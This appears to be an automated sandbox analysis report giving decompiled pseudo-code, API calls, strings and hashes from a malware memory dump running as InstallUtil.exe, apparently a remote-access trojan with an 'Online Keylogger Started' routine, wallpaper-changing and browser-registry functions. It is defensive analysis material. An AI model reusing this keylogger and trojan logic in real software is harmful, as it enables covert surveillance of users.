0x0043e500
0x0043e502
0x0043e51a
0x0043e520
0x00000000
0x0043e520
0x0043e504
0x0043e507
0x0043e507
0x0043e50a
0x0043e50c
0x0043e50f
0x0043e50f
0x0043e511
0x0043e512
0x0043e515
0x0043e515
0x00000000
0x0043e49e
0x00000000
0x0043e4a1

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043E59E
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043E5B3

Strings

C, xrefs: 0043E5AD
C, xrefs: 0043E4C0

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: C$ C
API String ID: 885266447-660835233
Opcode ID: 12299c0d31a1e32b64bcbfa084a60165fd947028ff0ed7e447246c73cd1db717
Instruction ID: c194ee352a8ba9574bb54a844d16d4457d29dbd80075ea9d5bdc892b1ac82eab
Opcode Fuzzy Hash: 12299c0d31a1e32b64bcbfa084a60165fd947028ff0ed7e447246c73cd1db717
Instruction Fuzzy Hash: BE517371E01108AFCF14DF9AC8849ADBBF2EF88318F19815AE819973A1E775DD51CB44

Uniqueness

Uniqueness Score: -1.00%

Function 0040182A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 142
threadCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040182A(void* __edx, intOrPtr _a8, intOrPtr _a16) {
				char _v32;
				void* _v52;
				char _v64;
				void* _v76;
				char _v96;
				void* _v100;
				char _v120;
				void* _v124;
				char _v144;
				void* _v148;
				char _v168;
				void* _v172;
				char _v192;
				void* _v196;
				char _v216;
				char _v220;
				char _v232;
				char _v240;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t28;
				void* _t32;
				void* _t33;
				void* _t34;
				void* _t40;
				signed int _t59;
				void* _t107;
				void* _t121;
				signed int _t122;
				void* _t124;

				_t107 = __edx;
				_t124 = (_t122 & 0xfffffff8) - 0xdc;
				if( *0x46fe48 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c])) + 4))) {
					E00430D17(0x46fe48);
					_t127 =  *0x46fe48 - 0xffffffff;
					if( *0x46fe48 == 0xffffffff) {
						E004046B7(0x46fdc8, _t121, 0);
						E004310BE(_t127, E00453CA0);
						E00430CD8(0x46fe48, 0x46fe48);
					}
				}
				E0040209F(0,  &_v220);
				_t28 = _a8 - 0x3be;
				if(_t28 == 0) {
					L10:
					 *0x46fe4c = 0;
					goto L11;
				} else {
					if(_t28 != 0) {
						L11:
						return E00401F98();
					}
					_t130 =  *0x46da74 - 1;
					if( *0x46da74 != 1) {
						_t32 = E00401E25(0x46e0cc, _t107, _t121, _t130,  *0x46fe4c);
						_t33 = E00402077(0,  &_v32, _t107, _t121, _t130, _a16, 0x20);
						_t34 = E00402077(0,  &_v64, _t107, _t121, _t130, 0x46da98, 0x12);
						_t113 = E00402ED0(0,  &_v192, E00402E61( &_v168, E00402ED0(0,  &_v144, E00402E61( &_v120, E00402EF1( &_v96, 0x46e10c, _t121, 0x46e260), _t34), _t121, _t130, 0x46e260), _t33), _t121, _t130, 0x46e260);
						_t40 = E00402ED0(0,  &_v216, _t39, _t121, _t130, _t32);
						_t13 =  &_v240; // 0x46e260
						E00401FA2(_t13, _t39, 0x46e260, _t40);
						E00401F98();
						E00401F98();
						E00401F98();
						E00401F98();
						E00401F98();
						E00401F98();
						E00401F98();
						E00401F98();
						waveInUnprepareHeader( *0x46dab8, ( *0x46fe4c << 5) +  *0x46e108, 0x20);
						E004017AC( *0x46fe4c, _t39, _t130);
						_t131 =  *0x46fdcc - 0xffffffff;
						if( *0x46fdcc == 0xffffffff) {
							E00404804(0x46fdc8);
							E0040489F(0x46fdc8, 0x46e260, 0x46fdc8);
						}
						E004020B6(0, _t124 - 0x18, _t113, _t131,  &_v232);
						_push(0x61);
						E00404A78(0x46fdc8, _t113, _t131);
						_t59 =  *0x46fe4c + 1;
						 *0x46fe4c = _t59;
						if(_t59 < 2) {
							goto L11;
						} else {
							goto L10;
						}
					}
					E00404DFD(_t107);
					ExitThread(0);
				}
			}

0x0040182a
0x00401836
0x00401853
0x0040185b
0x00401860
0x00401868
0x0040186d
0x00401877
0x0040187e
0x00401883
0x00401868
0x00401888
0x00401890
0x00401895
0x00401a15
0x00401a15
0x00000000
0x0040189b
0x0040189f
0x00401a1b
0x00401a2a
0x00401a2a
0x004018a5
0x004018ac
0x004018c7
0x004018df
0x004018f4
0x00401943
0x00401949
0x00401950
0x00401954
0x0040195d
0x00401966
0x0040196f
0x00401978
0x00401984
0x00401990
0x0040199c
0x004019a8
0x004019c4
0x004019d0
0x004019d5
0x004019dc
0x004019e0
0x004019e8
0x004019e8
0x004019f7
0x004019fc
0x00401a00
0x00401a0a
0x00401a0b
0x00401a13
0x00000000
0x00000000
0x00000000
0x00000000
0x00401a13
0x004018b0
0x004018b6
0x004018b6

APIs

__Init_thread_footer.LIBCMT ref: 0040187E
ExitThread.KERNEL32 ref: 004018B6
waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,0046E260,00000000), ref: 004019C4

Part of subcall function 004310BE: __onexit.LIBCMT ref: 004310C4

Strings

`F, xrefs: 00401950

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
String ID: `F
API String ID: 1649129571-3520748611
Opcode ID: a55d45382636431a70b28e65ff94c6419641bb50a0d313086208a579fb9b6c36
Instruction ID: 2dee2ec2161f66d9b9244a10a6034dac15416112390a30e3df994b068027022e
Opcode Fuzzy Hash: a55d45382636431a70b28e65ff94c6419641bb50a0d313086208a579fb9b6c36
Instruction Fuzzy Hash: 6041F6316042004BC328FB25EC86AAF73A5AB81358F00453FF146A71F2EFB85949CB5E

Uniqueness

Uniqueness Score: -1.00%

Function 0043F514 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E0043F514(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t36;
				struct HINSTANCE__* _t37;
				struct HINSTANCE__* _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				CHAR* _t49;
				struct HINSTANCE__* _t50;
				void* _t52;
				struct HINSTANCE__* _t55;
				intOrPtr* _t59;
				struct HINSTANCE__* _t64;
				intOrPtr _t65;

				_t52 = __ecx;
				if(_a4 == 2 || _a4 == 1) {
					E0044AD49(_t52);
					GetModuleFileNameA(0, 0x46d3c8, 0x104);
					_t49 =  *0x46da40; // 0x11e34d8
					 *0x46da48 = 0x46d3c8;
					if(_t49 == 0 ||  *_t49 == 0) {
						_t49 = 0x46d3c8;
					}
					_v8 = 0;
					_v16 = 0;
					E0043F638(_t52, _t49, 0, 0,  &_v8,  &_v16);
					_t64 = E0043F7AD(_v8, _v16, 1);
					if(_t64 != 0) {
						E0043F638(_t52, _t49, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
						if(_a4 != 1) {
							_v12 = 0;
							_push( &_v12);
							_t50 = E0044A864(_t49, 0, _t64, _t64);
							if(_t50 == 0) {
								_t59 = _v12;
								_t55 = 0;
								_t36 = _t59;
								if( *_t59 == 0) {
									L15:
									_t37 = 0;
									 *0x46da34 = _t55;
									_v12 = 0;
									_t50 = 0;
									 *0x46da38 = _t59;
									L16:
									E004427C2(_t37);
									_v12 = 0;
									goto L17;
								} else {
									goto L14;
								}
								do {
									L14:
									_t36 = _t36 + 4;
									_t55 =  &(_t55->i);
								} while ( *_t36 != 0);
								goto L15;
							}
							_t37 = _v12;
							goto L16;
						}
						 *0x46da34 = _v8 - 1;
						_t43 = _t64;
						_t64 = 0;
						 *0x46da38 = _t43;
						goto L10;
					} else {
						_t44 = E00439941();
						_push(0xc);
						_pop(0);
						 *_t44 = 0;
						L10:
						_t50 = 0;
						L17:
						E004427C2(_t64);
						return _t50;
					}
				} else {
					_t45 = E00439941();
					_t65 = 0x16;
					 *_t45 = _t65;
					E0043862C();
					return _t65;
				}
			}

0x0043f514
0x0043f521
0x0043f541
0x0043f554
0x0043f55a
0x0043f560
0x0043f568
0x0043f56f
0x0043f56f
0x0043f574
0x0043f57b
0x0043f582
0x0043f594
0x0043f59b
0x0043f5ba
0x0043f5c6
0x0043f5e1
0x0043f5e4
0x0043f5eb
0x0043f5f1
0x0043f5f8
0x0043f5fb
0x0043f5fd
0x0043f601
0x0043f60b
0x0043f60b
0x0043f60d
0x0043f613
0x0043f616
0x0043f618
0x0043f61e
0x0043f61f
0x0043f625
0x00000000
0x00000000
0x00000000
0x00000000
0x0043f603
0x0043f603
0x0043f603
0x0043f606
0x0043f607
0x00000000
0x0043f603
0x0043f5f3
0x00000000
0x0043f5f3
0x0043f5cc
0x0043f5d1
0x0043f5d3
0x0043f5d5
0x00000000
0x0043f59d
0x0043f59d
0x0043f5a2
0x0043f5a4
0x0043f5a5
0x0043f5da
0x0043f5da
0x0043f628
0x0043f629
0x00000000
0x0043f632
0x0043f529
0x0043f529
0x0043f530
0x0043f531
0x0043f533
0x00000000
0x0043f538

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe,00000104), ref: 0043F554
_free.LIBCMT ref: 0043F61F
_free.LIBCMT ref: 0043F629

Strings

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, xrefs: 0043F54B, 0043F552, 0043F581, 0043F5B9

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: _free$FileModuleName
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
API String ID: 2506810119-2118511638
Opcode ID: 9b9e57fb20614b64aae31c5f69d4271fda5d7d4308588e891ecc6e60cb97c154
Instruction ID: 2d8171768386c24464799b7b69c9a9af3925e8cd910694c6a44d0b6c0c4735b7
Opcode Fuzzy Hash: 9b9e57fb20614b64aae31c5f69d4271fda5d7d4308588e891ecc6e60cb97c154
Instruction Fuzzy Hash: D43193B1E05204BFDB21DF9A998199FBBE8EB98314F10507BF804D7311D6B88E46CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00418F13 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 27%

			E00418F13(void* __ecx, void* __edx) {
				void* __ebx;
				char* _t10;
				void* _t12;
				void* _t14;
				void* _t15;
				void* _t16;
				void* _t17;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t27;
				void* _t28;
				void* _t32;
				void* _t34;

				_t21 = __edx;
				_t24 = __edx;
				_t12 = __ecx;
				if(_t12 == 0) {
					_push(1);
					_t28 = _t27 - 0x18;
					_t10 = "0";
					E00402053(_t10, _t28, __edx, _t26, _t10);
					_t25 = "Control Panel\\Desktop";
					_push("WallpaperStyle");
					_t22 = "Control Panel\\Desktop";
					E00410CE2(_t28, "Control Panel\\Desktop");
					_push(1);
					_t14 = _t28 + 0x20 - 0x18;
					_push(_t10);
					goto L11;
				} else {
					_t15 = _t12 - 1;
					if(_t15 == 0) {
						_push(1);
						_t32 = _t27 - 0x18;
						_t16 = _t32;
						_push("2");
						goto L7;
					} else {
						_t17 = _t15 - 1;
						if(_t17 == 0) {
							_push(1);
							_t32 = _t27 - 0x18;
							_t16 = _t32;
							_push("10");
							goto L7;
						} else {
							_t18 = _t17 - 1;
							if(_t18 == 0) {
								_push(1);
								_t32 = _t27 - 0x18;
								_t16 = _t32;
								_push("6");
								L7:
								E00402053(_t10, _t16, _t21, _t26);
								_t25 = "Control Panel\\Desktop";
								_push("WallpaperStyle");
								_t22 = "Control Panel\\Desktop";
								E00410CE2(_t16, "Control Panel\\Desktop");
								_push(1);
								_t14 = _t32 + 0x20 - 0x18;
								_push("0");
								goto L11;
							} else {
								if(_t18 == 1) {
									_push(1);
									_t34 = _t27 - 0x18;
									E00402053(_t10, _t34, __edx, _t26, "0");
									_t25 = "Control Panel\\Desktop";
									_push("WallpaperStyle");
									_t22 = "Control Panel\\Desktop";
									E00410CE2(_t34, "Control Panel\\Desktop");
									_push(1);
									_t14 = _t34 + 0x20 - 0x18;
									_push("1");
									L11:
									E00402053(_t10, _t14, _t22, _t26);
									E00410CE2(_t14, _t25);
								}
							}
						}
					}
				}
				return SystemParametersInfoW(0x14, 0, _t24, 3);
			}

0x00418f13
0x00418f16
0x00418f18
0x00418f1b
0x00418fbf
0x00418fc1
0x00418fc4
0x00418fcc
0x00418fd1
0x00418fd6
0x00418fdb
0x00418fdd
0x00418fe5
0x00418fea
0x00418fec
0x00000000
0x00418f21
0x00418f21
0x00418f24
0x00418fb1
0x00418fb3
0x00418fb6
0x00418fb8
0x00000000
0x00418f2a
0x00418f2a
0x00418f2d
0x00418fa3
0x00418fa5
0x00418fa8
0x00418faa
0x00000000
0x00418f2f
0x00418f2f
0x00418f32
0x00418f70
0x00418f72
0x00418f75
0x00418f77
0x00418f7c
0x00418f7c
0x00418f81
0x00418f86
0x00418f8b
0x00418f8d
0x00418f95
0x00418f9a
0x00418f9c
0x00000000
0x00418f34
0x00418f37
0x00418f3d
0x00418f3f
0x00418f49
0x00418f4e
0x00418f53
0x00418f58
0x00418f5a
0x00418f62
0x00418f67
0x00418f69
0x00418fed
0x00418fed
0x00418ff9
0x00418ffe
0x00418f37
0x00418f32
0x00418f2d
0x00418f24
0x00419011

APIs

SystemParametersInfoW.USER32 ref: 00419008

Part of subcall function 00410CE2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 00410CF1
Part of subcall function 00410CE2: RegSetValueExA.KERNELBASE(?,00462000,00000000,?,00000000,00000000,0046E5A0,?,pth_unenc,0040D31C,00462000,3.5.1 Pro), ref: 00410D19
Part of subcall function 00410CE2: RegCloseKey.KERNELBASE(?,?,pth_unenc,0040D31C,00462000,3.5.1 Pro), ref: 00410D24

Strings

Control Panel\Desktop, xrefs: 00418F4E, 00418F81, 00418FD1
WallpaperStyle, xrefs: 00418F53, 00418F86, 00418FD6
TileWallpaper, xrefs: 00418FF2

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: CloseCreateInfoParametersSystemValue
String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
API String ID: 4127273184-3576401099
Opcode ID: 2dff6032570f7190d019cdeba908e25c71bcbf8c15ac2d7c415868f2eb706b18
Instruction ID: e7745c1b48172c67d7e360463aad66b4cc9f2f7f8c797338d566decf2a162258
Opcode Fuzzy Hash: 2dff6032570f7190d019cdeba908e25c71bcbf8c15ac2d7c415868f2eb706b18
Instruction Fuzzy Hash: 8A119072B8865037D818353E4E1BFAF2C029382B64F64415FF6012A6D6E8DE4AD243DF

Uniqueness

Uniqueness Score: -1.00%

Function 004097F2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68
timeCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E004097F2(void* __ebx, void* __ecx, void* __eflags, char _a4) {
				struct _SYSTEMTIME _v20;
				char _v44;
				char _v68;
				void* __edi;
				void* __esi;
				void* __ebp;
				WCHAR* _t28;
				void* _t61;
				void* _t62;
				void* _t64;
				void* _t65;
				void* _t66;

				_t66 = __eflags;
				_t61 = __ecx;
				GetLocalTime( &_v20);
				E00401ED3( &_a4, _t21, _t62, E00402FD4(__ebx,  &_v44, E0040A01F( &_v68, L"\r\n[%04i/%02i/%02i %02i:%02i:%02i ", _t64,  &_a4), _t61, _t64, _t66, L"]\r\n"));
				E00401EC9();
				E00401EC9();
				_push(0x64 + E0040243C() * 2);
				_t28 = E00438691( &_a4);
				_push(_v20.wSecond & 0x0000ffff);
				_push(_v20.wMinute & 0x0000ffff);
				_push(_v20.wHour & 0x0000ffff);
				_push(_v20.wDay & 0x0000ffff);
				_push(_v20.wMonth & 0x0000ffff);
				wsprintfW(_t28, E00401EC4( &_a4));
				E0040413E(__ebx, _t65, _t21, _t64, _t28);
				E00408D60(_t61, _v20.wYear & 0x0000ffff);
				L0043868C(_t28);
				return E00401EC9();
			}

0x004097f2
0x004097fd
0x00409800
0x0040982c
0x00409834
0x0040983c
0x00409850
0x00409851
0x00409861
0x00409866
0x0040986b
0x00409870
0x00409875
0x00409881
0x0040988c
0x00409893
0x00409899
0x004098ac

APIs

GetLocalTime.KERNEL32(?,?,00000000), ref: 00409800
wsprintfW.USER32 ref: 00409881

Part of subcall function 00408D60: SetEvent.KERNEL32(?,?,?,00409EBD,?,?,?,?,?,00000000), ref: 00408D8C

Strings

[%04i/%02i/%02i %02i:%02i:%02i , xrefs: 00409809
], xrefs: 0040980E

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: EventLocalTimewsprintf
String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
API String ID: 1497725170-1359877963
Opcode ID: 61f980347a0de8429949275f94f9ba41580dcfd8d279299a1af9398fa76adad3
Instruction ID: 5c7debe3a55a11437ab77da88efdcb51d5695efab24355448d0721f194ee9547
Opcode Fuzzy Hash: 61f980347a0de8429949275f94f9ba41580dcfd8d279299a1af9398fa76adad3
Instruction Fuzzy Hash: 9C119A725101186AC708FB56EC558FF77BCAE48355B00012FF802661D1EF7C5A86C6AD

Uniqueness

Uniqueness Score: -1.00%

Function 00409579 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65
threadCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00409579(void* __ecx, void* __edx) {
				char _v28;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t7;
				void* _t18;
				void* _t31;
				void* _t32;
				void* _t33;

				_t31 = __ecx;
				_t38 =  *((char*)(__ecx + 0x4a));
				if( *((char*)(__ecx + 0x4a)) == 0) {
					 *((char*)(__ecx + 0x4a)) = 1;
					E00402053(_t18,  &_v28, __edx, _t32, "Online Keylogger Started");
					_t34 = _t33 - 0x18;
					E00418385(_t33 - 0x18,  &_v28);
					E004097F2(_t18, _t31, _t38);
					E00401F98();
					E00402053(_t18, _t34 - 0x18,  &_v28, _t32, "Online Keylogger Started");
					E00402053(_t18, _t34,  &_v28, _t32, "i");
					E00417D02(_t18, "Online Keylogger Started");
					if( *((intOrPtr*)(_t31 + 0x49)) == 0) {
						if( *_t31 == 0) {
							CreateThread(0, 0, E00408A21, _t31, 0, 0);
						}
						CreateThread(0, 0, E00408A43, _t31, 0, 0);
					}
					return CreateThread(0, 0, E00408A4F, _t31, 0, 0);
				}
				return _t7;
			}

0x00409581
0x00409584
0x00409588
0x00409593
0x0040959b
0x004095a0
0x004095a8
0x004095af
0x004095b7
0x004095c2
0x004095d1
0x004095d6
0x004095e9
0x004095ed
0x004095f9
0x004095f9
0x00409605
0x00409605
0x00000000
0x00409611
0x00409619

APIs

Part of subcall function 004097F2: GetLocalTime.KERNEL32(?,?,00000000), ref: 00409800
Part of subcall function 004097F2: wsprintfW.USER32 ref: 00409881

Part of subcall function 00417D02: GetLocalTime.KERNEL32(00000000), ref: 00417D1C

CreateThread.KERNEL32 ref: 004095F9
CreateThread.KERNEL32 ref: 00409605
CreateThread.KERNEL32 ref: 00409611

Strings

Online Keylogger Started, xrefs: 0040958E, 00409597, 004095C1

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: CreateThread$LocalTime$wsprintf
String ID: Online Keylogger Started
API String ID: 112202259-1258561607
Opcode ID: e2a93841264675db23c2ea1d6ea455b36c5ce47d7530236e1a6bbff3732667af
Instruction ID: ddcc4882a412459d5fea0c8e021e8693bc3a835cc6765f9535291a0227f72f0e
Opcode Fuzzy Hash: e2a93841264675db23c2ea1d6ea455b36c5ce47d7530236e1a6bbff3732667af
Instruction Fuzzy Hash: E701A5A17042183AEA2076669C86DBF7A2DCA82398B40047FF541226C3D9B91C4586FA

Uniqueness

Uniqueness Score: -1.00%

Function 00405133 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00405133() {
				void* __ebx;
				void* __ecx;
				long _t19;
				void* _t24;
				intOrPtr _t28;
				void* _t29;
				void* _t30;
				void* _t31;
				void* _t32;
				void* _t33;
				intOrPtr _t40;

				_t31 = _t24;
				 *((intOrPtr*)(_t31 + 0x78)) = 0;
				if( *((intOrPtr*)(_t31 + 0x74)) <= 0) {
					L3:
					 *((char*)(_t31 + 0x5c)) = 0;
					_t40 =  *0x46dd00; // 0x0
					if(_t40 != 0) {
						_t34 = _t33 - 0x18;
						E00402053(0, _t33 - 0x18, _t29, _t32, "Connection Timeout");
						E00402053(0, _t34 - 0x18, _t29, _t32, "E");
						E00417D02(0, _t30);
					}
					E00404DFD(_t29);
					return 1;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t19 = WaitForSingleObject( *(_t31 + 0x60), 0x3e8);
					 *((intOrPtr*)(_t31 + 0x78)) =  *((intOrPtr*)(_t31 + 0x78)) + 1;
					_t28 =  *((intOrPtr*)(_t31 + 0x78));
					if(_t19 == 0) {
						break;
					}
					if(_t28 <  *((intOrPtr*)(_t31 + 0x74))) {
						continue;
					}
					goto L3;
				}
				CloseHandle( *(_t31 + 0x60));
				 *(_t31 + 0x60) = 0;
				 *((char*)(_t31 + 0x5c)) = 0;
				SetEvent( *(_t31 + 0x64));
				return 0;
			}

0x00405136
0x0040513a
0x00405140
0x0040515f
0x0040515f
0x00405162
0x00405168
0x0040516a
0x00405174
0x00405183
0x00405188
0x0040518d
0x00405192
0x00000000
0x00000000
0x00000000
0x00000000
0x00405142
0x00405142
0x0040514a
0x00405150
0x00405153
0x00405158
0x00000000
0x00000000
0x0040515d
0x00000000
0x00000000
0x00000000
0x0040515d
0x004051a1
0x004051aa
0x004051ad
0x004051b0
0x00000000

APIs

WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405130), ref: 0040514A
CloseHandle.KERNEL32(?), ref: 004051A1
SetEvent.KERNEL32(?), ref: 004051B0

Strings

Connection Timeout, xrefs: 0040516F

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: CloseEventHandleObjectSingleWait
String ID: Connection Timeout
API String ID: 2055531096-499159329
Opcode ID: e2cd3d883d8a6469c3c95d2af252fb402bfecd5877f52b3bff7841f152166546
Instruction ID: 3fad8cf9e20b9a7c721a7d92192759209fadb61df01daa6405a8acb1fa4b4cc6
Opcode Fuzzy Hash: e2cd3d883d8a6469c3c95d2af252fb402bfecd5877f52b3bff7841f152166546
Instruction Fuzzy Hash: 5101F531A00B50AFD7217F36CC8656B7BE5EF01345700097EE58356AB1D6789440CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040C1E8 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0040C256

Strings

ios_base::failbit set, xrefs: 0040C238
ios_base::eofbit set, xrefs: 0040C245
ios_base::badbit set, xrefs: 0040C212

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: 5cb3b7dfbcab637d0db5144c3dd6879bfc1a86f44dec66821c92e093eba352e9
Instruction ID: ecda74b64f0aae795754a9d35f2d4a83299d45ae645231e4eb91f75fd87cafa8
Opcode Fuzzy Hash: 5cb3b7dfbcab637d0db5144c3dd6879bfc1a86f44dec66821c92e093eba352e9
Instruction Fuzzy Hash: 8201A271944308EED714E7D5CC93FBA73689B50704F1445AFBD01BA5C2EA7C69028AAE

Uniqueness

Uniqueness Score: -1.00%

Function 00410B89 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40
registryCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00410B89(void* __ecx) {
				void* _v8;
				int _v12;
				char _v2060;
				void* __ebp;
				void* _t17;
				void* _t20;
				void* _t22;
				void* _t23;

				_v12 = 0x400;
				_t22 = __ecx;
				if(RegOpenKeyExW(0x80000000, L"http\\shell\\open\\command", 0, 0x20019,  &_v8) != 0) {
					_push(0x4610ec);
				} else {
					RegQueryValueExW(_v8, 0, 0, 0,  &_v2060,  &_v12);
					RegCloseKey(_v8);
					_push( &_v2060);
				}
				E0040413E(_t17, _t22, _t20, _t23);
				return _t22;
			}

0x00410b97
0x00410ba6
0x00410bbb
0x00410be6
0x00410bbd
0x00410bce
0x00410bd7
0x00410be3
0x00410be3
0x00410bed
0x00410bf9

APIs

RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,0046E600,?), ref: 00410BB3
RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 00410BCE
RegCloseKey.ADVAPI32(00000000), ref: 00410BD7

Strings

http\shell\open\command, xrefs: 00410BA9

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: http\shell\open\command
API String ID: 3677997916-1487954565
Opcode ID: ecc569d483912ee7fb832d98fa5ac824910cbea9664234a1c4b76fbe9997402b
Instruction ID: 1679abcfcf8286d8f63617c11c9f2e3348491008ec7351ab3acca8fe723e8ce1
Opcode Fuzzy Hash: ecc569d483912ee7fb832d98fa5ac824910cbea9664234a1c4b76fbe9997402b
Instruction Fuzzy Hash: EEF0C831604118FBDB109695EC09EDFBBBCEB80B05F2001A6B605E6050DA745AC587A5

Uniqueness

Uniqueness Score: -1.00%

Function 0040B9C6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040B9C6(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v16;
				signed int _t34;
				signed int* _t49;
				signed int* _t57;
				void* _t65;
				signed int* _t66;

				_t65 = __ecx;
				E00431C0B(__ecx, 0);
				E0040D691(__ecx + 4);
				E0040D691(__ecx + 0xc);
				E0040D67B(__ecx + 0x14);
				E0040D67B(__ecx + 0x1c);
				E0040D691(__ecx + 0x24);
				E0040D691(__ecx + 0x2c);
				_t76 = _a4;
				if(_a4 == 0) {
					_t49 =  &_v16;
					E0040B971(_t49, "bad locale name");
					E00435A36( &_v16, 0x469630);
					asm("int3");
					_push(_t65);
					_t66 = _t49;
					E00431F9E(_t66);
					E0040D676( &(_t66[0xb]));
					E0040D676( &(_t66[9]));
					E0040D676( &(_t66[7]));
					E0040D676( &(_t66[5]));
					E0040D676( &(_t66[3]));
					E0040D676( &(_t66[1]));
					_t57 = _t66;
					_t34 =  *_t57;
					__eflags = _t34;
					if(_t34 == 0) {
						return E00441990(4);
					} else {
						__eflags = _t34 - 8;
						if(_t34 < 8) {
							_t37 = 0x46d050 + _t34 * 0x18;
							__eflags = 0x46d050 + _t34 * 0x18;
							return E004324B0(0x46d050 + _t34 * 0x18, _t37);
						}
						return _t34;
					}
				} else {
					E00431F53(__ebx, __edx, __edi, _t76, __ecx, _a4);
					return _t65;
				}
			}

0x0040b9cf
0x0040b9d1
0x0040b9d9
0x0040b9e1
0x0040b9e9
0x0040b9f1
0x0040b9f9
0x0040ba01
0x0040ba06
0x0040ba0a
0x0040ba25
0x0040ba28
0x0040ba36
0x0040ba3b
0x0040ba3c
0x0040ba3d
0x0040ba40
0x0040ba49
0x0040ba51
0x0040ba59
0x0040ba61
0x0040ba69
0x0040ba71
0x0040ba76
0x00431c63
0x00431c65
0x00431c67
0x004419b8
0x00431c6d
0x00431c6d
0x00431c70
0x00431c75
0x00431c75
0x00000000
0x00431c80
0x00431c81
0x00431c81
0x0040ba0c
0x0040ba10
0x0040ba1d
0x0040ba1d

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040B9D1
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040BA10

Part of subcall function 00431F53: _Yarn.LIBCPMT ref: 00431F72
Part of subcall function 00431F53: _Yarn.LIBCPMT ref: 00431F96

__CxxThrowException@8.LIBVCRUNTIME ref: 0040BA36

Strings

